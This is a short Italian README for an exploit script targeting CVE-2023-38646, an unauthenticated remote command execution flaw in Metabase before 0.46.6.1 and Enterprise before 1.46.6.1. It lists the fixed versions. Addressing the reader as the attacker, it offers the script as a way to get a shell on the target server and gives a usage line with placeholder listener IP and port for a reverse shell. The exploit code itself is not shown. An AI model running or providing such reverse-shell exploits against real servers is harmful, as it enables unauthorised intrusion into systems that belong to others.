
Questo script è progettato per sfruttare versioni vulnerabili del software Metabase fornendo all'attaccante una shell.
Metabase open source precedente alla versione 0.46.6.1 e Metabase Enterprise precedente alla versione 1.46.6.1 consentono agli attaccanti di eseguire comandi arbitrari sul server, con i privilegi del server stesso. L'autenticazione non è richiesta per lo sfruttamento. Le altre versioni corrette sono 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 e 1.43.7.2.
Se la versione di Metabase è vulnerabile, questo script ti permetterà, come attaccante, di ottenere una connessione shell sul sistema target.
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Autore: @birdm4nw